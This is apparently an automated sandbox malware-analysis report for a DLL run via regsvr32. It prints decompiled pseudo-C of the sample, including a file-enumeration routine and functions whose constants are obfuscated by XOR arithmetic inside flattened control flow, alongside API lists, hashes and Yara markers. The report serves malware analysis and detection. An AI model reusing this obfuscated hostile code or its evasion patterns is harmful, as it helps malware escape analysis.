                                                                                                                0x001aa199
                                                                                                                0x001aa1a9
                                                                                                                0x001aa1ae
                                                                                                                0x001aa1b2
                                                                                                                0x001aa1bd
                                                                                                                0x001aa1c4
                                                                                                                0x001aa1c8
                                                                                                                0x001aa1d0
                                                                                                                0x001aa1db
                                                                                                                0x001aa1e3
                                                                                                                0x001aa1ee
                                                                                                                0x001aa1f9
                                                                                                                0x001aa200
                                                                                                                0x001aa20b
                                                                                                                0x001aa218
                                                                                                                0x001aa21c
                                                                                                                0x001aa224
                                                                                                                0x001aa22c
                                                                                                                0x001aa234
                                                                                                                0x001aa23c
                                                                                                                0x001aa244
                                                                                                                0x001aa248
                                                                                                                0x001aa250
                                                                                                                0x001aa250
                                                                                                                0x001aa252
                                                                                                                0x001aa253
                                                                                                                0x001aa253
                                                                                                                0x001aa253
                                                                                                                0x001aa253
                                                                                                                0x001aa255
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001aa25b
                                                                                                                0x001aa333
                                                                                                                0x001aa33a
                                                                                                                0x001aa33a
                                                                                                                0x001aa250
                                                                                                                0x001aa250
                                                                                                                0x001aa252
                                                                                                                0x00000000
                                                                                                                0x001aa252
                                                                                                                0x001aa261
                                                                                                                0x001aa267
                                                                                                                0x001aa2ee
                                                                                                                0x001aa308
                                                                                                                0x001aa30a
                                                                                                                0x001aa30d
                                                                                                                0x001aa30f
                                                                                                                0x001aa315
                                                                                                                0x001aa250
                                                                                                                0x001aa250
                                                                                                                0x001aa252
                                                                                                                0x00000000
                                                                                                                0x001aa252
                                                                                                                0x001aa250
                                                                                                                0x001aa26d
                                                                                                                0x001aa273
                                                                                                                0x001aa2cb
                                                                                                                0x001aa2d1
                                                                                                                0x001aa2dc
                                                                                                                0x001aa2dc
                                                                                                                0x001aa2df
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001aa2d9
                                                                                                                0x001aa2d9
                                                                                                                0x001aa2d9
                                                                                                                0x001aa2e1
                                                                                                                0x001aa2e4
                                                                                                                0x00000000
                                                                                                                0x001aa275
                                                                                                                0x001aa27b
                                                                                                                0x001aa4c5
                                                                                                                0x001aa281
                                                                                                                0x001aa287
                                                                                                                0x00000000
                                                                                                                0x001aa28d
                                                                                                                0x001aa2bc
                                                                                                                0x001aa2c1
                                                                                                                0x001aa2c4
                                                                                                                0x001aa250
                                                                                                                0x001aa250
                                                                                                                0x001aa252
                                                                                                                0x00000000
                                                                                                                0x001aa252
                                                                                                                0x001aa250
                                                                                                                0x001aa287
                                                                                                                0x001aa27b
                                                                                                                0x001aa273
                                                                                                                0x001aa267
                                                                                                                0x001aa4cc
                                                                                                                0x001aa4dd
                                                                                                                0x001aa4dd
                                                                                                                0x001aa344
                                                                                                                0x001aa34a
                                                                                                                0x001aa405
                                                                                                                0x001aa409
                                                                                                                0x001aa40e
                                                                                                                0x001aa41d
                                                                                                                0x001aa440
                                                                                                                0x001aa452
                                                                                                                0x001aa458
                                                                                                                0x001aa471
                                                                                                                0x001aa491
                                                                                                                0x001aa496
                                                                                                                0x001aa499
                                                                                                                0x001aa49e
                                                                                                                0x001aa4a5
                                                                                                                0x00000000
                                                                                                                0x001aa350
                                                                                                                0x001aa350
                                                                                                                0x001aa356
                                                                                                                0x001aa3f6
                                                                                                                0x001aa3fb
                                                                                                                0x001aa3fe
                                                                                                                0x00000000
                                                                                                                0x001aa35c
                                                                                                                0x001aa35c
                                                                                                                0x001aa362
                                                                                                                0x00000000
                                                                                                                0x001aa368
                                                                                                                0x001aa3c2
                                                                                                                0x001aa3c4
                                                                                                                0x001aa3c7
                                                                                                                0x001aa3c9
                                                                                                                0x00000000
                                                                                                                0x001aa3cf
                                                                                                                0x001aa3cf
                                                                                                                0x001aa3d4
                                                                                                                0x001aa250
                                                                                                                0x001aa250
                                                                                                                0x001aa252
                                                                                                                0x00000000
                                                                                                                0x001aa252
                                                                                                                0x001aa250
                                                                                                                0x001aa3c9
                                                                                                                0x001aa362
                                                                                                                0x001aa356
                                                                                                                0x00000000
                                                                                                                0x001aa4a6
                                                                                                                0x001aa4a6
                                                                                                                0x001aa4a6
                                                                                                                0x00000000
                                                                                                                0x001aa4b2

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: pa$$<$%$/v$3})$D.|$RDv$`/D${C$($@
                                                                                                                • API String ID: 1725840886-3390780285
                                                                                                                • Opcode ID: ee6712fe2374403ed138b28623e957e4654de3edba437386c5cdf8d324fa88f1
                                                                                                                • Instruction ID: 9f71d3e08c29d2b5abd9748930d180933410ba88240a7b63820ef7a7650d8537
                                                                                                                • Opcode Fuzzy Hash: ee6712fe2374403ed138b28623e957e4654de3edba437386c5cdf8d324fa88f1
                                                                                                                • Instruction Fuzzy Hash: 482213715083809FD368CF65C94AA9BFBE1FBC5718F508A1DE2DA86260D7B18949CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002A9C8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 106filestringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E1002A9C8(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t19;
				void* _t26;
				void* _t28;
				void* _t39;
				long _t43;
				CHAR* _t46;
				void* _t47;
				void* _t57;
				void* _t59;
				void* _t61;
				void* _t64;
				signed int _t66;
				void* _t68;

				_t57 = __edx;
				_t66 = _t68 - 0x90;
				_t19 =  *0x1006dbdc; // 0xdf7c0cda
				 *(_t66 + 0x8c) = _t19 ^ _t66;
				_t46 =  *(_t66 + 0x98);
				_t59 = __ecx;
				E1002A585(__ecx);
				_t75 = _t46;
				if(_t46 != 0) {
					__eflags = lstrlenA(_t46) - 0x104;
					if(__eflags < 0) {
						goto L2;
					} else {
						_push(0xa0);
						goto L6;
					}
				} else {
					_t46 = 0x1005c750;
					L2:
					 *(_t59 + 8) = E100160BC(_t75, 0x140);
					E100202D5(_t46, _t57, _t59, 0x104, _t66, _t23 + 0x2c, 0x104, _t46);
					_t26 = FindFirstFileA(_t46,  *(_t59 + 8));
					 *(_t59 + 0xc) = _t26;
					if(_t26 != 0xffffffff) {
						_t49 = _t59 + 0x10;
						 *((intOrPtr*)(_t66 - 0x7c)) = _t59 + 0x10;
						 *((intOrPtr*)(_t66 - 0x78)) = E1001ADAB(_t46, _t59 + 0x10, 0x104);
						_t28 = E10041365(_t59 + 0x10, _t57, _t27, _t46, 0x104);
						__eflags = _t28;
						if(_t28 != 0) {
							E1000B0F0(_t46, 0, 0x104, E1003F251(_t49, _t57,  *((intOrPtr*)(_t66 - 0x78)), _t66 - 0x80, 3, _t66 - 0x74, 0x100, 0, 0, 0, 0));
							E1000B0F0(_t46, 0, 0x104, E1003F472(_t49, _t57,  *((intOrPtr*)(_t66 - 0x78)), 0x104, _t66 - 0x80, _t66 - 0x74, 0, 0));
							E10019B0F(_t46,  *((intOrPtr*)(_t66 - 0x7c)), 0, 0xffffffff);
							_t39 = 1;
							__eflags = 1;
						} else {
							E100015C0(_t46,  *((intOrPtr*)(_t66 - 0x7c)), _t59, _t28);
							E1002A585(_t59);
							_push(0x7b);
							goto L6;
						}
					} else {
						_t43 = GetLastError();
						E1002A585(_t59);
						_push(_t43);
						L6:
						SetLastError();
						_t39 = 0;
					}
				}
				_pop(_t61);
				_pop(_t64);
				_pop(_t47);
				return E1003B437(_t39, _t47,  *(_t66 + 0x8c) ^ _t66, _t57, _t61, _t64);
			}




















                                                                                                                0x1002a9c8
                                                                                                                0x1002a9c9
                                                                                                                0x1002a9d6
                                                                                                                0x1002a9dd
                                                                                                                0x1002a9e4
                                                                                                                0x1002a9ec
                                                                                                                0x1002a9ee
                                                                                                                0x1002a9f3
                                                                                                                0x1002a9fa
                                                                                                                0x1002aa47
                                                                                                                0x1002aa49
                                                                                                                0x00000000
                                                                                                                0x1002aa4b
                                                                                                                0x1002aa4b
                                                                                                                0x00000000
                                                                                                                0x1002aa4b
                                                                                                                0x1002a9fc
                                                                                                                0x1002a9fc
                                                                                                                0x1002aa01
                                                                                                                0x1002aa0c
                                                                                                                0x1002aa14
                                                                                                                0x1002aa20
                                                                                                                0x1002aa29
                                                                                                                0x1002aa2c
                                                                                                                0x1002aa5a
                                                                                                                0x1002aa5e
                                                                                                                0x1002aa69
                                                                                                                0x1002aa6c
                                                                                                                0x1002aa74
                                                                                                                0x1002aa76
                                                                                                                0x1002aaaa
                                                                                                                0x1002aac6
                                                                                                                0x1002aad1
                                                                                                                0x1002aad8
                                                                                                                0x1002aad8
                                                                                                                0x1002aa78
                                                                                                                0x1002aa7c
                                                                                                                0x1002aa83
                                                                                                                0x1002aa88
                                                                                                                0x00000000
                                                                                                                0x1002aa88
                                                                                                                0x1002aa2e
                                                                                                                0x1002aa2e
                                                                                                                0x1002aa38
                                                                                                                0x1002aa3d
                                                                                                                0x1002aa50
                                                                                                                0x1002aa50
                                                                                                                0x1002aa56
                                                                                                                0x1002aa56
                                                                                                                0x1002aa2c
                                                                                                                0x1002aadf
                                                                                                                0x1002aae0
                                                                                                                0x1002aae3
                                                                                                                0x1002aaf0

                                                                                                                APIs
                                                                                                                • FindFirstFileA.KERNEL32(?,?,?,?,?,00000000), ref: 1002AA20
                                                                                                                • GetLastError.KERNEL32(?,?,?,00000000), ref: 1002AA2E
                                                                                                                • lstrlenA.KERNEL32(?,?,?,00000000), ref: 1002AA41
                                                                                                                • SetLastError.KERNEL32(0000007B,00000000,?,?,00000104,?,?,?,00000000), ref: 1002AA50
                                                                                                                  • Part of subcall function 100160BC: _malloc.LIBCMT ref: 100160D6
                                                                                                                  • Part of subcall function 100202D5: _strcpy_s.LIBCMT ref: 100202E1
                                                                                                                • __fullpath.LIBCMT ref: 1002AA6C
                                                                                                                • __splitpath_s.LIBCMT ref: 1002AAA4
                                                                                                                • __makepath_s.LIBCMT ref: 1002AABD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$FileFindFirst__fullpath__makepath_s__splitpath_s_malloc_strcpy_slstrlen
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 23357613-438819550
                                                                                                                • Opcode ID: a1175ebd5c32ebfb7ecd3f7ddaccccb158d4b424fa1911c62c394038ba9268e1
                                                                                                                • Instruction ID: 1c295b4fe22b876962f74ccdec7c0b03fc35fe44166c1e575907a980132fd0c9
                                                                                                                • Opcode Fuzzy Hash: a1175ebd5c32ebfb7ecd3f7ddaccccb158d4b424fa1911c62c394038ba9268e1
                                                                                                                • Instruction Fuzzy Hash: 19310675A00218AFEB20DBB59C89EAFBBADEF49350F500529F515D3182DF34A584CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B490E Relevance: 14.0, Strings: 11, Instructions: 268COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001B490E(intOrPtr* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				unsigned int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				void* __ecx;
				void* _t270;
				intOrPtr _t297;
				intOrPtr _t300;
				void* _t301;
				intOrPtr _t304;
				void* _t305;
				intOrPtr* _t306;
				void* _t308;
				intOrPtr _t329;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int* _t340;

				_t331 = _a8;
				_t306 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E001AC98A(_t270);
				_v16 = 0x1e1fdc;
				_t340 =  &(( &_v132)[4]);
				_v12 = 0x8f04d3;
				_t329 = 0;
				_v8 = 0;
				_v84 = 0xaed5c8;
				_t308 = 0x8bce7cc;
				_t332 = 0x79;
				_v84 = _v84 / _t332;
				_v84 = _v84 + 0xffff7fac;
				_v84 = _v84 ^ 0x0000f193;
				_v104 = 0x520938;
				_t18 =  &_v104; // 0x520938
				_t333 = 0x67;
				_v104 =  *_t18 * 0xf;
				_v104 = _v104 + 0xfffff651;
				_v104 = _v104 ^ 0x5b86bce7;
				_v104 = _v104 ^ 0x5f483c7f;
				_v116 = 0x1a3b30;
				_v116 = _v116 >> 0xb;
				_v116 = _v116 * 0x55;
				_v116 = _v116 | 0xa4eb5901;
				_v116 = _v116 ^ 0xa4eb5f93;
				_v52 = 0x567239;
				_v52 = _v52 << 0xc;
				_v52 = _v52 ^ 0x67239000;
				_v72 = 0xa293fa;
				_v72 = _v72 ^ 0xce79500f;
				_v72 = _v72 / _t333;
				_v72 = _v72 ^ 0x02022236;
				_v88 = 0x236cf;
				_v88 = _v88 + 0xffffca86;
				_t334 = 0x54;
				_v88 = _v88 / _t334;
				_v88 = _v88 >> 1;
				_v88 = _v88 ^ 0x0000030e;
				_v44 = 0x4b6b6d;
				_v44 = _v44 | 0x304461e0;
				_v44 = _v44 ^ 0x304f6bed;
				_v120 = 0x38f127;
				_v120 = _v120 + 0x83fc;
				_v120 = _v120 * 0x57;
				_v120 = _v120 + 0x8f0c;
				_v120 = _v120 ^ 0x138a0fbb;
				_v48 = 0x939707;
				_v48 = _v48 + 0xd80e;
				_v48 = _v48 ^ 0x009aaf7e;
				_v124 = 0xa6467a;
				_v124 = _v124 ^ 0x2ba836ff;
				_v124 = _v124 + 0xffffdaa0;
				_v124 = _v124 >> 7;
				_v124 = _v124 ^ 0x005dc1c4;
				_v76 = 0xbc38d0;
				_v76 = _v76 << 0xe;
				_t335 = 0x27;
				_v76 = _v76 / _t335;
				_v76 = _v76 ^ 0x00534322;
				_v80 = 0xcc9200;
				_v80 = _v80 >> 4;
				_t336 = 0x2e;
				_v80 = _v80 / _t336;
				_v80 = _v80 ^ 0x000b77a0;
				_v128 = 0x3290fd;
				_v128 = _v128 << 7;
				_v128 = _v128 << 1;
				_v128 = _v128 ^ 0x5fbc701e;
				_v128 = _v128 ^ 0x6d2b621b;
				_v132 = 0x4b51fa;
				_t337 = 0x56;
				_v132 = _v132 * 0x78;
				_v132 = _v132 >> 0xf;
				_v132 = _v132 * 0x61;
				_v132 = _v132 ^ 0x001ff7cd;
				_v56 = 0xeac1c6;
				_v56 = _v56 / _t337;
				_v56 = _v56 >> 4;
				_v56 = _v56 ^ 0x0001640d;
				_v36 = 0xc3f93f;
				_v36 = _v36 ^ 0x8d6f80a8;
				_v36 = _v36 ^ 0x8dacb193;
				_v40 = 0xd47fa6;
				_v40 = _v40 + 0x168d;
				_v40 = _v40 ^ 0x00d27183;
				_v60 = 0x2e794b;
				_v60 = _v60 << 0x10;
				_v60 = _v60 ^ 0x97016c2a;
				_v60 = _v60 ^ 0xee45846f;
				_v92 = 0x91d655;
				_v92 = _v92 | 0x227ad1d6;
				_v92 = _v92 >> 9;
				_v92 = _v92 + 0x59d1;
				_v92 = _v92 ^ 0x0010831d;
				_v96 = 0xc9cb77;
				_v96 = _v96 * 6;
				_v96 = _v96 * 0x17;
				_v96 = _v96 + 0x73b0;
				_v96 = _v96 ^ 0x6cc63849;
				_v64 = 0xe0bf4e;
				_v64 = _v64 + 0xc16d;
				_v64 = _v64 | 0x3ce14c71;
				_v64 = _v64 ^ 0x3cecb28c;
				_v68 = 0xcade6d;
				_v68 = _v68 + 0xe21a;
				_v68 = _v68 >> 0xd;
				_v68 = _v68 ^ 0x0007e842;
				_v100 = 0xd90c03;
				_v100 = _v100 * 0x15;
				_v100 = _v100 + 0xffffe9c2;
				_v100 = _v100 ^ 0x4cfeb3c8;
				_v100 = _v100 ^ 0x5d3f778a;
				_v108 = 0xccac7;
				_v108 = _v108 << 0xb;
				_v108 = _v108 | 0x6245e5f1;
				_v108 = _v108 >> 9;
				_v108 = _v108 ^ 0x003a500d;
				_v112 = 0x2d4a41;
				_v112 = _v112 + 0x7932;
				_v112 = _v112 + 0x3672;
				_v112 = _v112 >> 0xa;
				_v112 = _v112 ^ 0x0009eacf;
				_v28 = 0x1addad;
				_v28 = _v28 | 0x511d8649;
				_v28 = _v28 ^ 0x5117cbe1;
				_v32 = 0x5c2216;
				_v32 = _v32 * 0x5f;
				_v32 = _v32 ^ 0x223a1567;
				do {
					while(_t308 != 0x1a66778) {
						if(_t308 == 0x3bdc732) {
							E001B17D2(_v28, _v32, _v24);
						} else {
							if(_t308 == 0x5d2c538) {
								_t300 =  *0x1c4208; // 0x0
								_t301 = E001B50D4(_v88,  &_v20,  *((intOrPtr*)(_t300 + 0x1c)), _v92, _v96, _t308, _v64,  *((intOrPtr*)(_t331 + 4)), _v68, _v100, _t308, _v24,  *_t331, _v104, _v108, _v112, _v20);
								_t340 =  &(_t340[0xf]);
								if(_t301 == _v44) {
									 *_t306 = _v24;
									_t329 = 1;
									 *((intOrPtr*)(_t306 + 4)) = _v20;
								} else {
									_t308 = 0x3bdc732;
									continue;
								}
							} else {
								if(_t308 == 0x8bce7cc) {
									_t308 = 0x93f6055;
									continue;
								} else {
									if(_t308 != 0x93f6055) {
										goto L14;
									} else {
										_t304 =  *0x1c4208; // 0x0
										_t305 = E001B50D4(_v116,  &_v20,  *((intOrPtr*)(_t304 + 0x1c)), _v120, _v48, _t308, _v124,  *((intOrPtr*)(_t331 + 4)), _v76, _v80, _t308, _t329,  *_t331, _v84, _v128, _v132, _v52);
										_t340 =  &(_t340[0xf]);
										if(_t305 == _v72) {
											_t308 = 0x1a66778;
											continue;
										}
									}
								}
							}
						}
						L18:
						return _t329;
					}
					_push(_t308);
					_t297 = E001A303A(_t308, _v20);
					_t340 =  &(_t340[3]);
					_v24 = _t297;
					if(_t297 == 0) {
						_t308 = 0xb2eda1a;
						goto L14;
					} else {
						_t308 = 0x5d2c538;
						continue;
					}
					goto L18;
					L14:
				} while (_t308 != 0xb2eda1a);
				goto L18;
			}




















































                                                                                                                0x001b4917
                                                                                                                0x001b491e
                                                                                                                0x001b4921
                                                                                                                0x001b4922
                                                                                                                0x001b4929
                                                                                                                0x001b492b
                                                                                                                0x001b4930
                                                                                                                0x001b493b
                                                                                                                0x001b493e
                                                                                                                0x001b4949
                                                                                                                0x001b494b
                                                                                                                0x001b4954
                                                                                                                0x001b495c
                                                                                                                0x001b4967
                                                                                                                0x001b496c
                                                                                                                0x001b4972
                                                                                                                0x001b497a
                                                                                                                0x001b4982
                                                                                                                0x001b498a
                                                                                                                0x001b498f
                                                                                                                0x001b4992
                                                                                                                0x001b4996
                                                                                                                0x001b499e
                                                                                                                0x001b49a6
                                                                                                                0x001b49ae
                                                                                                                0x001b49b6
                                                                                                                0x001b49c0
                                                                                                                0x001b49c4
                                                                                                                0x001b49cc
                                                                                                                0x001b49d4
                                                                                                                0x001b49dc
                                                                                                                0x001b49e1
                                                                                                                0x001b49e9
                                                                                                                0x001b49f1
                                                                                                                0x001b4a01
                                                                                                                0x001b4a05
                                                                                                                0x001b4a0d
                                                                                                                0x001b4a15
                                                                                                                0x001b4a21
                                                                                                                0x001b4a24
                                                                                                                0x001b4a28
                                                                                                                0x001b4a2c
                                                                                                                0x001b4a34
                                                                                                                0x001b4a3c
                                                                                                                0x001b4a44
                                                                                                                0x001b4a4c
                                                                                                                0x001b4a54
                                                                                                                0x001b4a61
                                                                                                                0x001b4a65
                                                                                                                0x001b4a6d
                                                                                                                0x001b4a75
                                                                                                                0x001b4a7d
                                                                                                                0x001b4a85
                                                                                                                0x001b4a8d
                                                                                                                0x001b4a95
                                                                                                                0x001b4a9d
                                                                                                                0x001b4aa5
                                                                                                                0x001b4aaa
                                                                                                                0x001b4ab2
                                                                                                                0x001b4aba
                                                                                                                0x001b4ac7
                                                                                                                0x001b4acc
                                                                                                                0x001b4ad2
                                                                                                                0x001b4ada
                                                                                                                0x001b4ae2
                                                                                                                0x001b4aeb
                                                                                                                0x001b4af0
                                                                                                                0x001b4af6
                                                                                                                0x001b4afe
                                                                                                                0x001b4b06
                                                                                                                0x001b4b0b
                                                                                                                0x001b4b0f
                                                                                                                0x001b4b17
                                                                                                                0x001b4b1f
                                                                                                                0x001b4b2c
                                                                                                                0x001b4b2d
                                                                                                                0x001b4b31
                                                                                                                0x001b4b3b
                                                                                                                0x001b4b3f
                                                                                                                0x001b4b47
                                                                                                                0x001b4b55
                                                                                                                0x001b4b59
                                                                                                                0x001b4b5e
                                                                                                                0x001b4b66
                                                                                                                0x001b4b6e
                                                                                                                0x001b4b76
                                                                                                                0x001b4b7e
                                                                                                                0x001b4b86
                                                                                                                0x001b4b8e
                                                                                                                0x001b4b96
                                                                                                                0x001b4b9e
                                                                                                                0x001b4ba3
                                                                                                                0x001b4bab
                                                                                                                0x001b4bb3
                                                                                                                0x001b4bbb
                                                                                                                0x001b4bc3
                                                                                                                0x001b4bc8
                                                                                                                0x001b4bd0
                                                                                                                0x001b4bd8
                                                                                                                0x001b4be5
                                                                                                                0x001b4bee
                                                                                                                0x001b4bf2
                                                                                                                0x001b4bfa
                                                                                                                0x001b4c02
                                                                                                                0x001b4c0a
                                                                                                                0x001b4c12
                                                                                                                0x001b4c1a
                                                                                                                0x001b4c22
                                                                                                                0x001b4c2a
                                                                                                                0x001b4c32
                                                                                                                0x001b4c37
                                                                                                                0x001b4c3f
                                                                                                                0x001b4c4c
                                                                                                                0x001b4c50
                                                                                                                0x001b4c58
                                                                                                                0x001b4c60
                                                                                                                0x001b4c68
                                                                                                                0x001b4c70
                                                                                                                0x001b4c75
                                                                                                                0x001b4c7d
                                                                                                                0x001b4c82
                                                                                                                0x001b4c8a
                                                                                                                0x001b4c92
                                                                                                                0x001b4c9a
                                                                                                                0x001b4ca2
                                                                                                                0x001b4ca7
                                                                                                                0x001b4caf
                                                                                                                0x001b4cbc
                                                                                                                0x001b4cc4
                                                                                                                0x001b4ccc
                                                                                                                0x001b4cd9
                                                                                                                0x001b4cdd
                                                                                                                0x001b4ce5
                                                                                                                0x001b4ce5
                                                                                                                0x001b4cf3
                                                                                                                0x001b4e41
                                                                                                                0x001b4cf9
                                                                                                                0x001b4cff
                                                                                                                0x001b4db6
                                                                                                                0x001b4dc2
                                                                                                                0x001b4dc7
                                                                                                                0x001b4dce
                                                                                                                0x001b4e26
                                                                                                                0x001b4e28
                                                                                                                0x001b4e30
                                                                                                                0x001b4dd0
                                                                                                                0x001b4dd0
                                                                                                                0x00000000
                                                                                                                0x001b4dd0
                                                                                                                0x001b4d01
                                                                                                                0x001b4d07
                                                                                                                0x001b4d70
                                                                                                                0x00000000
                                                                                                                0x001b4d09
                                                                                                                0x001b4d0f
                                                                                                                0x00000000
                                                                                                                0x001b4d15
                                                                                                                0x001b4d4b
                                                                                                                0x001b4d57
                                                                                                                0x001b4d5c
                                                                                                                0x001b4d63
                                                                                                                0x001b4d69
                                                                                                                0x00000000
                                                                                                                0x001b4d69
                                                                                                                0x001b4d63
                                                                                                                0x001b4d0f
                                                                                                                0x001b4d07
                                                                                                                0x001b4cff
                                                                                                                0x001b4e47
                                                                                                                0x001b4e53
                                                                                                                0x001b4e53
                                                                                                                0x001b4dea
                                                                                                                0x001b4df3
                                                                                                                0x001b4df8
                                                                                                                0x001b4dfb
                                                                                                                0x001b4e01
                                                                                                                0x001b4e0d
                                                                                                                0x00000000
                                                                                                                0x001b4e03
                                                                                                                0x001b4e03
                                                                                                                0x00000000
                                                                                                                0x001b4e03
                                                                                                                0x00000000
                                                                                                                0x001b4e12
                                                                                                                0x001b4e12
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: P:$"CS$8R$9rV$AJ-$Ky.$U`?$U`?$qL<$r6$kO0
                                                                                                                • API String ID: 0-914005703
                                                                                                                • Opcode ID: efbd27ced40be660087bbe5ea393bdf4da003f5eca6297a75b3ff362c2c24a99
                                                                                                                • Instruction ID: 9ae216924df35b79274dae1217f2a5006b66fecc6fd395bd08690d7ca5642387
                                                                                                                • Opcode Fuzzy Hash: efbd27ced40be660087bbe5ea393bdf4da003f5eca6297a75b3ff362c2c24a99
                                                                                                                • Instruction Fuzzy Hash: B4D10F720093819FC368CF65C58A95BFBE1FBC4748F50891DF2A686261D7B6D948CF42
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001BD4AE Relevance: 13.0, Strings: 10, Instructions: 457COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001BD4AE() {
				char _v520;
				char _v1040;
				char _v1044;
				signed int _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				signed int _v1212;
				signed int _v1216;
				signed int _v1220;
				signed int _v1224;
				signed int _v1228;
				signed int _v1232;
				signed int _v1236;
				signed int _v1240;
				signed int _v1244;
				signed int _v1248;
				signed int _v1252;
				void* _t529;
				void* _t531;
				intOrPtr _t534;
				intOrPtr _t536;
				intOrPtr* _t544;
				signed int _t553;
				intOrPtr _t554;
				intOrPtr* _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t567;
				void* _t568;
				void* _t620;
				signed int _t622;
				signed int* _t626;

				_t626 =  &_v1252;
				_v1120 = 0x119309;
				_v1120 = _v1120 ^ 0x5c748870;
				_v1048 = 0;
				_t620 = 0xb91f4a5;
				_t556 = 0x28;
				_v1120 = _v1120 / _t556;
				_v1120 = _v1120 ^ 0x024f53ca;
				_v1228 = 0x79d756;
				_v1228 = _v1228 + 0xfffff93d;
				_v1228 = _v1228 | 0xe3cb3b46;
				_v1228 = _v1228 + 0x1302;
				_v1228 = _v1228 ^ 0x63fc0ed8;
				_v1172 = 0xe9915e;
				_v1172 = _v1172 ^ 0xe1bebd5b;
				_v1172 = _v1172 + 0xf473;
				_v1172 = _v1172 ^ 0xe158207a;
				_v1232 = 0x1d0c2f;
				_v1232 = _v1232 << 5;
				_t557 = 0x13;
				_v1232 = _v1232 * 0x1d;
				_v1232 = _v1232 + 0xffff0974;
				_v1232 = _v1232 ^ 0x694b33d5;
				_v1244 = 0x49a320;
				_v1244 = _v1244 / _t557;
				_v1244 = _v1244 ^ 0xa0ae19a1;
				_v1244 = _v1244 >> 3;
				_v1244 = _v1244 ^ 0x14148cb7;
				_v1160 = 0x2c918e;
				_v1160 = _v1160 ^ 0x0eac0473;
				_v1160 = _v1160 << 0xd;
				_v1160 = _v1160 ^ 0x12b54449;
				_v1136 = 0x622af6;
				_v1136 = _v1136 + 0xfea4;
				_t558 = 0x4d;
				_v1136 = _v1136 / _t558;
				_v1136 = _v1136 ^ 0x0007c842;
